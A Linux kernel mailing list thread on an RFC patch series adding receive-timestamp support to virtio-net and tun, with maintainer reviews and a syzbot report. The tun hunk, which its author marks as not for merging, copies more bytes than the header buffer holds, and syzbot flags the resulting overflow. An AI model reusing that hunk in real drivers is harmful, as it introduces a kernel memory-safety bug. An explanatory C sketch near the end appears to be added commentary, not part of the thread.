lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping
feature from Willem de Bruijn.

Original series:
Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com
Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time
From: Willem de Bruijn <willemb@google.com>

RFC for four new features to the virtio network device:

1. pass tx flow state to host, for routing + telemetry
2. pass rx tstamp to guest, for better RTT estimation
3. pass tx tstamp to guest, idem
4. pass tx delivery time to host, for accurate pacing

All would introduce an extension to the virtio spec.

The changes in this series are to the driver side. For the changes to
qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps

Currently only virtio-net is supported. Performance was tested with
pktgen, which doesn't show a decrease in transfer speeds.

As these patches are now mostly different from the initial patchset, I
removed Willem's Signed-off-bys, so he needn't be ashamed of what his
work evolved to ;)

Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
Changes in v2:
- rework patches to use flow filter instead of feature flag
- Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de

---
Steffen Trumtrar (2):
      tun: support rx-tstamp
      virtio-net: support receive timestamp

 drivers/net/tun.c               |  30 +++++----
 drivers/net/virtio_net.c        | 136 ++++++++++++++++++++++++++++++++++++----
 include/uapi/linux/virtio_net.h |   9 +++
 3 files changed, 151 insertions(+), 24 deletions(-)
---
base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8
change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d

Best regards,
-- 
Steffen Trumtrar <s.trumtrar@pengutronix.de>
Demonstrate support for the new virtio-net feature VIRTIO_NET_HDR_F_TSTAMP.

This is not intended to be merged. A full feature test also requires a
patched qemu binary that knows these features and negotiates the correct
vnet_hdr_sz in virtio_net_set_mrg_rx_bufs. See
https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps

Not-yet-signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
 drivers/net/tun.c | 30 ++++++++++++++++++------------
 1 file changed, 18 insertions(+), 12 deletions(-)

diff --git a/drivers/net/tun.c b/drivers/net/tun.c
index 8192740357a09..aa988a9c4bc99 100644
--- a/drivers/net/tun.c
+++ b/drivers/net/tun.c
@@ -2065,23 +2065,29 @@ static ssize_t tun_put_user(struct tun_struct *tun,
 	}
 
 	if (vnet_hdr_sz) {
-		struct virtio_net_hdr_v1_hash_tunnel hdr;
-		struct virtio_net_hdr *gso;
+		struct virtio_net_hdr_v1_hash_tunnel_ts hdr;
+
+		memset(&hdr, 0, sizeof(hdr));
 
 		ret = tun_vnet_hdr_tnl_from_skb(tun->flags, tun->dev, skb,
-						&hdr);
+						(struct virtio_net_hdr_v1_hash_tunnel *)&hdr);
 		if (ret)
 			return ret;
 
-		/*
-		 * Drop the packet if the configured header size is too small
-		 * WRT the enabled offloads.
-		 */
-		gso = (struct virtio_net_hdr *)&hdr;
-		ret = __tun_vnet_hdr_put(vnet_hdr_sz, tun->dev->features,
-					 iter, gso);
-		if (ret)
-			return ret;
+		if (vnet_hdr_sz >= sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts)) {
+			__le64 tstamp = cpu_to_le64(ktime_get_ns());
+
+			hdr.tstamp_0 = (tstamp & 0x000000000000ffffULL) >> 0;
+			hdr.tstamp_1 = (tstamp & 0x00000000ffff0000ULL) >> 16;
+			hdr.tstamp_2 = (tstamp & 0x0000ffff00000000ULL) >> 32;
+			hdr.tstamp_3 = (tstamp & 0xffff000000000000ULL) >> 48;
+		}
+
+		if (unlikely(iov_iter_count(iter) < vnet_hdr_sz))
+			return -EINVAL;
+
+		if (unlikely(copy_to_iter(&hdr, vnet_hdr_sz, iter) != vnet_hdr_sz))
+			return -EFAULT;
 	}
 
 	if (vlan_hlen) {
-- 
2.52.0
Author: Steffen Trumtrar <s.trumtrar@pengutronix.de>
Date:   Thu, 29 Jan 2026 09:06:41 +0100
Thread: 20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz
Add optional hardware rx timestamp offload for virtio-net.

Introduce virtio feature VIRTIO_NET_F_TSTAMP. If negotiated, the
virtio-net header is expanded with room for a timestamp.

To get and set the hwtstamp, the functions ndo_hwtstamp_set/get need to
be implemented. This allows filtering the packets and timestamping only
the packets the filter matches. This way, timestamping can be
en/disabled at runtime.

Tested:
  guest: ./timestamping eth0 \
             SOF_TIMESTAMPING_RAW_HARDWARE \
             SOF_TIMESTAMPING_RX_HARDWARE
  host:  nc -4 -u 192.168.1.1 319

Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
--
Changes to last version:
- rework series to use flow filters
- add new struct virtio_net_hdr_v1_hash_tunnel_ts
- original work done by: Willem de Bruijn <willemb@google.com>
---
 drivers/net/virtio_net.c        | 136 ++++++++++++++++++++++++++++++++++++----
 include/uapi/linux/virtio_net.h |   9 +++
 2 files changed, 133 insertions(+), 12 deletions(-)

diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
index 1bb3aeca66c6e..4e8d9b20c1b34 100644
--- a/drivers/net/virtio_net.c
+++ b/drivers/net/virtio_net.c
@@ -429,6 +429,9 @@ struct virtnet_info {
 	struct virtio_net_rss_config_trailer rss_trailer;
 	u8 rss_hash_key_data[VIRTIO_NET_RSS_MAX_KEY_SIZE];
 
+	/* Device passes time stamps from the driver */
+	bool has_tstamp;
+
 	/* Has control virtqueue */
 	bool has_cvq;
 
@@ -475,6 +478,8 @@ struct virtnet_info {
 
 	struct control_buf *ctrl;
 
+	struct kernel_hwtstamp_config tstamp_config;
+
 	/* Ethtool settings */
 	u8 duplex;
 	u32 speed;
@@ -511,6 +516,7 @@ struct virtio_net_common_hdr {
 		struct virtio_net_hdr_mrg_rxbuf mrg_hdr;
 		struct virtio_net_hdr_v1_hash hash_v1_hdr;
 		struct virtio_net_hdr_v1_hash_tunnel tnl_hdr;
+		struct virtio_net_hdr_v1_hash_tunnel_ts ts_hdr;
 	};
 };
 
@@ -682,6 +688,13 @@ skb_vnet_common_hdr(struct sk_buff *skb)
 	return (struct virtio_net_common_hdr *)skb->cb;
 }
 
+static inline struct virtio_net_hdr_v1_hash_tunnel_ts *skb_vnet_hdr_ts(struct sk_buff *skb)
+{
+	BUILD_BUG_ON(sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts) > sizeof(skb->cb));
+
+	return (void *)skb->cb;
+}
+
 /*
  * private is used to chain pages for big packets, put the whole
  * most recent used list in the beginning for reuse
@@ -2560,6 +2573,15 @@ virtio_net_hash_value(const struct virtio_net_hdr_v1_hash *hdr_hash)
 	       (__le16_to_cpu(hdr_hash->hash_value_hi) << 16);
 }
 
+static inline u64
+virtio_net_tstamp_value(const struct virtio_net_hdr_v1_hash_tunnel_ts *hdr_hash_ts)
+{
+	return (u64)__le16_to_cpu(hdr_hash_ts->tstamp_0) |
+	       ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_1) << 16) |
+	       ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_2) << 32) |
+	       ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_3) << 48);
+}
+
 static void virtio_skb_set_hash(const struct virtio_net_hdr_v1_hash *hdr_hash,
 				struct sk_buff *skb)
 {
@@ -2589,6 +2611,18 @@ static void virtio_skb_set_hash(const struct virtio_net_hdr_v1_hash *hdr_hash,
 	skb_set_hash(skb, virtio_net_hash_value(hdr_hash), rss_hash_type);
 }
 
+static inline void virtnet_record_rx_tstamp(const struct virtnet_info *vi,
+					    struct sk_buff *skb)
+{
+	struct skb_shared_hwtstamps *shhwtstamps = skb_hwtstamps(skb);
+	const struct virtio_net_hdr_v1_hash_tunnel_ts *h = skb_vnet_hdr_ts(skb);
+	u64 ts;
+
+	ts = virtio_net_tstamp_value(h);
+	memset(shhwtstamps, 0, sizeof(struct skb_shared_hwtstamps));
+	shhwtstamps->hwtstamp = ns_to_ktime(ts);
+}
+
 static void virtnet_receive_done(struct virtnet_info *vi, struct receive_queue *rq,
 				 struct sk_buff *skb, u8 flags)
 {
@@ -2617,6 +2651,8 @@ static void virtnet_receive_done(struct virtnet_info *vi, struct receive_queue *
 			goto frame_err;
 	}
 
+	if (vi->has_tstamp && vi->tstamp_config.rx_filter != HWTSTAMP_FILTER_NONE)
+		virtnet_record_rx_tstamp(vi, skb);
 	skb_record_rx_queue(skb, vq2rxq(rq->vq));
 	skb->protocol = eth_type_trans(skb, dev);
 	pr_debug("Receiving skb proto 0x%04x len %i type %i\n",
@@ -3321,7 +3357,7 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan)
 {
 	const unsigned char *dest = ((struct ethhdr *)skb->data)->h_dest;
 	struct virtnet_info *vi = sq->vq->vdev->priv;
-	struct virtio_net_hdr_v1_hash_tunnel *hdr;
+	struct virtio_net_hdr_v1_hash_tunnel_ts *hdr;
 	int num_sg;
 	unsigned hdr_len = vi->hdr_len;
 	bool can_push;
@@ -3329,8 +3365,8 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan)
 	pr_debug("%s: xmit %p %pM\n", vi->dev->name, skb, dest);
 
 	/* Make sure it's safe to cast between formats */
-	BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->hash_hdr));
-	BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->hash_hdr.hdr));
+	BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->tnl.hash_hdr));
+	BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->tnl.hash_hdr.hdr));
 
 	can_push = vi->any_header_sg &&
 		   !((unsigned long)skb->data & (__alignof__(*hdr) - 1)) &&
@@ -3338,18 +3374,18 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan)
 	/* Even if we can, don't push here yet as this would skew
 	 * csum_start offset below. */
 	if (can_push)
-		hdr = (struct virtio_net_hdr_v1_hash_tunnel *)(skb->data -
-							       hdr_len);
+		hdr = (struct virtio_net_hdr_v1_hash_tunnel_ts *)(skb->data -
+								  hdr_len);
 	else
-		hdr = &skb_vnet_common_hdr(skb)->tnl_hdr;
+		hdr = &skb_vnet_common_hdr(skb)->ts_hdr;
 
-	if (virtio_net_hdr_tnl_from_skb(skb, hdr, vi->tx_tnl,
+	if (virtio_net_hdr_tnl_from_skb(skb, &hdr->tnl, vi->tx_tnl,
 					virtio_is_little_endian(vi->vdev), 0, false))
 		return -EPROTO;
 
 	if (vi->mergeable_rx_bufs)
-		hdr->hash_hdr.hdr.num_buffers = 0;
+		hdr->tnl.hash_hdr.hdr.num_buffers = 0;
 
 	sg_init_table(sq->sg, skb_shinfo(skb)->nr_frags + (can_push ? 1 : 2));
 	if (can_push) {
@@ -5563,6 +5599,22 @@ static int virtnet_get_per_queue_coalesce(struct net_device *dev,
 	return 0;
 }
 
+static int virtnet_get_ts_info(struct net_device *dev,
+			       struct kernel_ethtool_ts_info *info)
+{
+	/* setup default software timestamp */
+	ethtool_op_get_ts_info(dev, info);
+
+	info->rx_filters = (BIT(HWTSTAMP_FILTER_NONE) |
+			    BIT(HWTSTAMP_FILTER_PTP_V1_L4_SYNC) |
+			    BIT(HWTSTAMP_FILTER_PTP_V1_L4_DELAY_REQ) |
+			    BIT(HWTSTAMP_FILTER_ALL));
+
+	info->tx_types = HWTSTAMP_TX_OFF;
+
+	return 0;
+}
+
 static void virtnet_init_settings(struct net_device *dev)
 {
 	struct virtnet_info *vi = netdev_priv(dev);
@@ -5658,7 +5710,7 @@ static const struct ethtool_ops virtnet_ethtool_ops = {
 	.get_ethtool_stats = virtnet_get_ethtool_stats,
 	.set_channels = virtnet_set_channels,
 	.get_channels = virtnet_get_channels,
-	.get_ts_info = ethtool_op_get_ts_info,
+	.get_ts_info = virtnet_get_ts_info,
 	.get_link_ksettings = virtnet_get_link_ksettings,
 	.set_link_ksettings = virtnet_set_link_ksettings,
 	.set_coalesce = virtnet_set_coalesce,
@@ -6242,6 +6294,58 @@ static void virtnet_tx_timeout(struct net_device *dev, unsigned int txqueue)
 		   jiffies_to_usecs(jiffies - READ_ONCE(txq->trans_start)));
 }
 
+static int virtnet_hwtstamp_get(struct net_device *dev,
+				struct kernel_hwtstamp_config *tstamp_config)
+{
+	struct virtnet_info *vi = netdev_priv(dev);
+
+	if (!netif_running(dev))
+		return -EINVAL;
+
+	*tstamp_config = vi->tstamp_config;
+
+	return 0;
+}
+
+static int virtnet_hwtstamp_set(struct net_device *dev,
+				struct kernel_hwtstamp_config *tstamp_config,
+				struct netlink_ext_ack *extack)
+{
+	struct virtnet_info *vi = netdev_priv(dev);
+
+	if (!netif_running(dev))
+		return -EINVAL;
+
+	switch (tstamp_config->rx_filter) {
+	case HWTSTAMP_FILTER_PTP_V1_L4_SYNC:
+	case HWTSTAMP_FILTER_PTP_V1_L4_DELAY_REQ:
+		break;
+	case HWTSTAMP_FILTER_PTP_V2_EVENT:
+	case HWTSTAMP_FILTER_PTP_V2_L2_EVENT:
+	case HWTSTAMP_FILTER_PTP_V2_L4_EVENT:
+	case HWTSTAMP_FILTER_PTP_V2_SYNC:
+	case HWTSTAMP_FILTER_PTP_V2_L2_SYNC:
+	case HWTSTAMP_FILTER_PTP_V2_L4_SYNC:
+	case HWTSTAMP_FILTER_PTP_V2_DELAY_REQ:
+	case HWTSTAMP_FILTER_PTP_V2_L2_DELAY_REQ:
+	case HWTSTAMP_FILTER_PTP_V2_L4_DELAY_REQ:
+		tstamp_config->rx_filter = HWTSTAMP_FILTER_PTP_V2_EVENT;
+		break;
+	case HWTSTAMP_FILTER_NONE:
+		break;
+	case HWTSTAMP_FILTER_ALL:
+		tstamp_config->rx_filter = HWTSTAMP_FILTER_ALL;
+		break;
+	default:
+		tstamp_config->rx_filter = HWTSTAMP_FILTER_ALL;
+		return -ERANGE;
+	}
+
+	vi->tstamp_config = *tstamp_config;
+
+	return 0;
+}
+
 static int virtnet_init_irq_moder(struct virtnet_info *vi)
 {
 	u8 profile_flags = 0, coal_flags = 0;
@@ -6289,6 +6393,8 @@ static const struct net_device_ops virtnet_netdev = {
 	.ndo_get_phys_port_name = virtnet_get_phys_port_name,
 	.ndo_set_features = virtnet_set_features,
 	.ndo_tx_timeout = virtnet_tx_timeout,
+	.ndo_hwtstamp_set = virtnet_hwtstamp_set,
+	.ndo_hwtstamp_get = virtnet_hwtstamp_get,
 };
 
 static void virtnet_config_changed_work(struct work_struct *work)
@@ -6911,6 +7017,9 @@ static int virtnet_probe(struct virtio_device *vdev)
 	if (virtio_has_feature(vdev, VIRTIO_NET_F_HASH_REPORT))
 		vi->has_rss_hash_report = true;
 
+	if (virtio_has_feature(vdev, VIRTIO_NET_F_TSTAMP))
+		vi->has_tstamp = true;
+
 	if (virtio_has_feature(vdev, VIRTIO_NET_F_RSS)) {
 		vi->has_rss = true;
 
@@ -6945,8 +7054,10 @@ static int virtnet_probe(struct virtio_device *vdev)
 		dev->xdp_metadata_ops = &virtnet_xdp_metadata_ops;
 	}
 
-	if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_UDP_TUNNEL_GSO) ||
-	    virtio_has_feature(vdev, VIRTIO_NET_F_HOST_UDP_TUNNEL_GSO))
+	if (vi->has_tstamp)
+		vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts);
+	else if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_UDP_TUNNEL_GSO) ||
+		 virtio_has_feature(vdev, VIRTIO_NET_F_HOST_UDP_TUNNEL_GSO))
 		vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash_tunnel);
 	else if (vi->has_rss_hash_report)
 		vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash);
@@ -7269,7 +7380,8 @@ static struct virtio_device_id id_table[] = {
 	VIRTIO_NET_F_SPEED_DUPLEX, VIRTIO_NET_F_STANDBY, \
 	VIRTIO_NET_F_RSS, VIRTIO_NET_F_HASH_REPORT, VIRTIO_NET_F_NOTF_COAL, \
 	VIRTIO_NET_F_VQ_NOTF_COAL, \
-	VIRTIO_NET_F_GUEST_HDRLEN, VIRTIO_NET_F_DEVICE_STATS
+	VIRTIO_NET_F_GUEST_HDRLEN, VIRTIO_NET_F_DEVICE_STATS, \
+	VIRTIO_NET_F_TSTAMP
 
 static unsigned int features[] = {
 	VIRTNET_FEATURES,
diff --git a/include/uapi/linux/virtio_net.h b/include/uapi/linux/virtio_net.h
index 1db45b01532b5..9f967575956b8 100644
--- a/include/uapi/linux/virtio_net.h
+++ b/include/uapi/linux/virtio_net.h
@@ -56,6 +56,7 @@
 #define VIRTIO_NET_F_MQ	22	/* Device supports Receive Flow Steering */
 #define VIRTIO_NET_F_CTRL_MAC_ADDR 23	/* Set MAC address */
+#define VIRTIO_NET_F_TSTAMP	49	/* Device sends TAI receive time */
 #define VIRTIO_NET_F_DEVICE_STATS 50	/* Device can provide device-level statistics. */
 #define VIRTIO_NET_F_VQ_NOTF_COAL 52	/* Device supports virtqueue notification coalescing */
 #define VIRTIO_NET_F_NOTF_COAL	53	/* Device supports notifications coalescing */
@@ -215,6 +216,14 @@ struct virtio_net_hdr_v1_hash_tunnel {
 	__le16 inner_nh_offset;
 };
 
+struct virtio_net_hdr_v1_hash_tunnel_ts {
+	struct virtio_net_hdr_v1_hash_tunnel tnl;
+	__le16 tstamp_0;
+	__le16 tstamp_1;
+	__le16 tstamp_2;
+	__le16 tstamp_3;
+};
+
 #ifndef VIRTIO_NET_NO_LEGACY
 /* This header comes first in the scatter-gather list.
  * For legacy virtio, if VIRTIO_F_ANY_LAYOUT is not negotiated, it must
-- 
2.52.0
Author: Steffen Trumtrar <s.trumtrar@pengutronix.de>
Date:   Thu, 29 Jan 2026 09:06:42 +0100
On Thu, 29 Jan 2026 09:06:42 +0100, Steffen Trumtrar <s.trumtrar@pengutronix.de> wrote:

Since patch #1 uses this struct, this one should be placed first in the
series.

Also, has the virtio specification process accepted such a draft
proposal?

Thanks
Author: Xuan Zhuo <xuanzhuo@linux.alibaba.com>
Date:   Thu, 29 Jan 2026 17:48:25 +0800
Hi,

On 2026-01-29 at 17:48 +08, Xuan Zhuo <xuanzhuo@linux.alibaba.com> wrote:

Oh, you are right, the order should be the other way around.

I haven't sent the draft yet, because I'm unsure whether I understood
correctly how this should be implemented with the flow filter. If the
direction is correct, I'd try to get the specification process going
again. (That is not that easy if you're not used to it and not that
deep into the whole virtio universe ;))

Best regards,
Steffen

-- 
Pengutronix e.K.                 | Dipl.-Inform. Steffen Trumtrar |
Steuerwalder Str. 21             | https://www.pengutronix.de/    |
31137 Hildesheim, Germany        | Phone: +49-5121-206917-0       |
Amtsgericht Hildesheim, HRA 2686 | Fax:   +49-5121-206917-5555    |
Author: Steffen Trumtrar <s.trumtrar@pengutronix.de>
Date:   Thu, 29 Jan 2026 11:08:27 +0100
On Thu, 29 Jan 2026 11:08:27 +0100, Steffen Trumtrar <s.trumtrar@pengutronix.de> wrote:

There have been many historical attempts in this area; you may want to
take a look at those first.

Thanks.
Author: Xuan Zhuo <xuanzhuo@linux.alibaba.com>
Date:   Thu, 29 Jan 2026 19:03:15 +0800
syzbot ci has tested the following series

[v2] virtio-net: add flow filter for receive timestamps
https://lore.kernel.org/all/20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de
* [PATCH RFC v2 1/2] tun: support rx-tstamp
* [PATCH RFC v2 2/2] virtio-net: support receive timestamp

and found the following issue:
WARNING in __copy_overflow

Full report is available here:
https://ci.syzbot.org/series/0b35c8c9-603b-4126-ac04-0095faadb2f5

***

WARNING in __copy_overflow

tree:      net-next
URL:       https://kernel.googlesource.com/pub/scm/linux/kernel/git/netdev/net-next.git
base:      ffeafa65b2b26df2f5b5a6118d3174f17bd12ec5
arch:      amd64
compiler:  Debian clang version 21.1.8 (++20251221033036+2078da43e25a-1~exp1~20251221153213.50), Debian LLD 21.1.8
config:    https://ci.syzbot.org/builds/d8316da2-2688-4d74-bbf4-e8412e24d106/config
C repro:   https://ci.syzbot.org/findings/96af937a-787b-4fd5-baef-529fc80e0bb7/c_repro
syz repro: https://ci.syzbot.org/findings/96af937a-787b-4fd5-baef-529fc80e0bb7/syz_repro

------------[ cut here ]------------
Buffer overflow detected (32 < 1840)!
WARNING: mm/maccess.c:234 at __copy_overflow+0x17/0x30 mm/maccess.c:234, CPU#0: syz.0.17/5993
Modules linked in:
CPU: 0 UID: 0 PID: 5993 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
RIP: 0010:__copy_overflow+0x1c/0x30 mm/maccess.c:234
Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 55 53 48 89 f3 89 fd e8 60 b1 c4 ff 48 8d 3d 39 25 d5 0d 89 ee 48 89 da <67> 48 0f b9 3a 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 90 90
RSP: 0018:ffffc90003b97888 EFLAGS: 00010293
RAX: ffffffff81fdcf50 RBX: 0000000000000730 RCX: ffff88810ccd9d40
RDX: 0000000000000730 RSI: 0000000000000020 RDI: ffffffff8fd2f490
RBP: 0000000000000020 R08: ffffffff8fcec777 R09: 1ffffffff1f9d8ee
R10: dffffc0000000000 R11: ffffffff81742230 R12: dffffc0000000000
R13: 0000000000000000 R14: 0000000000000730 R15: 1ffff92000772f30
FS:  00007f08c446a6c0(0000) GS:ffff88818e32d000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f08c4448ff8 CR3: 000000010cec2000 CR4: 00000000000006f0
Call Trace:
 <TASK>
 copy_overflow include/linux/ucopysize.h:41 [inline]
 check_copy_size include/linux/ucopysize.h:50 [inline]
 copy_to_iter include/linux/uio.h:219 [inline]
 tun_put_user drivers/net/tun.c:2089 [inline]
 tun_do_read+0x1f44/0x28a0 drivers/net/tun.c:2190
 tun_chr_read_iter+0x13b/0x260 drivers/net/tun.c:2214
 do_iter_readv_writev+0x619/0x8c0 fs/read_write.c:-1
 vfs_readv+0x288/0x840 fs/read_write.c:1018
 do_readv+0x154/0x2e0 fs/read_write.c:1080
 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
 do_syscall_64+0xe2/0xf80 arch/x86/entry/syscall_64.c:94
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f08c359acb9
Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f08c446a028 EFLAGS: 00000246 ORIG_RAX: 0000000000000013
RAX: ffffffffffffffda RBX: 00007f08c3815fa0 RCX: 00007f08c359acb9
RDX: 0000000000000002 RSI: 0000200000000080 RDI: 0000000000000003
RBP: 00007f08c3608bf7 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f08c3816038 R14: 00007f08c3815fa0 R15: 00007fff6491da78
 </TASK>
----------------
Code disassembly (best guess):
   0:	90                   	nop
   1:	90                   	nop
   2:	90                   	nop
   3:	90                   	nop
   4:	90                   	nop
   5:	90                   	nop
   6:	90                   	nop
   7:	90                   	nop
   8:	90                   	nop
   9:	90                   	nop
   a:	90                   	nop
   b:	90                   	nop
   c:	90                   	nop
   d:	90                   	nop
   e:	f3 0f 1e fa          	endbr64
  12:	55                   	push   %rbp
  13:	53                   	push   %rbx
  14:	48 89 f3             	mov    %rsi,%rbx
  17:	89 fd                	mov    %edi,%ebp
  19:	e8 60 b1 c4 ff       	call   0xffc4b17e
  1e:	48 8d 3d 39 25 d5 0d 	lea    0xdd52539(%rip),%rdi        # 0xdd5255e
  25:	89 ee                	mov    %ebp,%esi
  27:	48 89 da             	mov    %rbx,%rdx
* 2a:	67 48 0f b9 3a       	ud1    (%edx),%rdi <-- trapping instruction
  2f:	5b                   	pop    %rbx
  30:	5d                   	pop    %rbp
  31:	c3                   	ret
  32:	cc                   	int3
  33:	cc                   	int3
  34:	cc                   	int3
  35:	cc                   	int3
  36:	cc                   	int3
  37:	cc                   	int3
  38:	cc                   	int3
  39:	cc                   	int3
  3a:	cc                   	int3
  3b:	cc                   	int3
  3c:	cc                   	int3
  3d:	cc                   	int3
  3e:	90                   	nop
  3f:	90                   	nop

***

If these findings have caused you to resend the series or submit a
separate fix, please add the following tag to your commit message:
Tested-by: syzbot@syzkaller.appspotmail.com

---
This report is generated by a bot. It may contain errors.
syzbot ci engineers can be reached at syzkaller@googlegroups.com.
Author: syzbot ci <syzbot+ci99a227ab2089b0fa@syzkaller.appspotmail.com>
Date:   Thu, 29 Jan 2026 05:27:03 -0800
Steffen Trumtrar wrote: Good to see this picked up. I would also still like to see support in virtio-net for HW timestamp pass-through.
{ "author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>", "date": "Sun, 01 Feb 2026 16:00:07 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
Steffen Trumtrar wrote: This patch refers to a struct that does not exist yet, so this cannot compile?
{ "author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>", "date": "Sun, 01 Feb 2026 16:00:49 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
Steffen Trumtrar wrote: Jason, Michael: creating a new struct for every field is not very elegant. Is it time to find a more forward-looking approach to expanding with new fields? Like a TLV, or how netlink structs like tcp_info are extended, with support for legacy users that only use a truncated struct?

It's fine to implement filters, but also fine to only support ALL or NONE for simplicity. In the end it probably depends on what the underlying physical device supports.

Why the multiple fields, rather than a u64?

More broadly: can my old patchset be dusted off as is, or does it require significant changes? I only paused it at the time because I did not have a real device back-end that was going to support it.
{ "author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>", "date": "Sun, 01 Feb 2026 16:05:54 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
On 2026-02-01 at 16:05 -05, Willem de Bruijn <willemdebruijn.kernel@gmail.com> wrote:

Yes, this gets complicated real fast and leads to really long calls for all the nested fields. If there is a different way, I'd prefer that.

Should have added a comment, but this is based on this patch:

  c3838262b824c71c145cd3668722e99a69bc9cd9
  virtio_net: fix alignment for virtio_net_hdr_v1_hash

  Changing alignment of header would mean it's no longer safe to cast
  a 2 byte aligned pointer between formats. Use two 16 bit fields to
  make it 2 byte aligned as previously.

This is the dusted off version ;)

With the flow filter it should be possible to turn the timestamps on and off during runtime.

Best regards,
Steffen

-- 
Pengutronix e.K.                | Dipl.-Inform. Steffen Trumtrar |
Steuerwalder Str. 21            | https://www.pengutronix.de/    |
31137 Hildesheim, Germany       | Phone: +49-5121-206917-0       |
Amtsgericht Hildesheim, HRA 2686| Fax:   +49-5121-206917-5555    |
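The alignment point from the referenced commit can be illustrated with a small standalone C sketch. The struct names here are made up for illustration only, not the real virtio-net headers: appending a raw 32-bit field raises the struct's alignment requirement to 4, so casting a pointer to memory that is only 2-byte aligned between the formats would be invalid, whereas storing the value as two 16-bit halves keeps the alignment at 2.

```c
#include <assert.h>
#include <stdalign.h>
#include <stdint.h>

/* Illustrative only: NOT the actual virtio-net header layouts. */
struct hdr_v1 {
	uint16_t flags;
	uint16_t len;
};

struct hdr_ext_u32 {		/* alignment becomes 4 on common ABIs */
	struct hdr_v1 hdr;
	uint32_t tstamp;
};

struct hdr_ext_split {		/* alignment stays 2 */
	struct hdr_v1 hdr;
	uint16_t tstamp_lo;
	uint16_t tstamp_hi;
};

_Static_assert(alignof(struct hdr_v1) == 2, "base header is 2-byte aligned");
_Static_assert(alignof(struct hdr_ext_split) == 2,
	       "split field keeps 2-byte alignment");

/* Reassemble the 32-bit value from its two 16-bit halves. */
static inline uint32_t hdr_tstamp(const struct hdr_ext_split *h)
{
	return (uint32_t)h->tstamp_lo | ((uint32_t)h->tstamp_hi << 16);
}
```

Because `struct hdr_ext_split` has the same alignment as `struct hdr_v1`, a pointer valid for the short format is also valid for the extended one.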
{ "author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>", "date": "Mon, 02 Feb 2026 08:34:58 +0100", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
On Sun, Feb 01, 2026 at 04:05:54PM -0500, Willem de Bruijn wrote: I certainly wouldn't mind, though I suspect tlv is too complex as hardware implementations can't efficiently follow linked lists. I'll try to ping some hardware designers for what works well for offloads.
{ "author": "\"Michael S. Tsirkin\" <mst@redhat.com>", "date": "Mon, 2 Feb 2026 02:59:31 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
Michael S. Tsirkin wrote: Great, thanks.

Agreed that TLV was probably the wrong suggestion. We can definitely have a required order of fields.

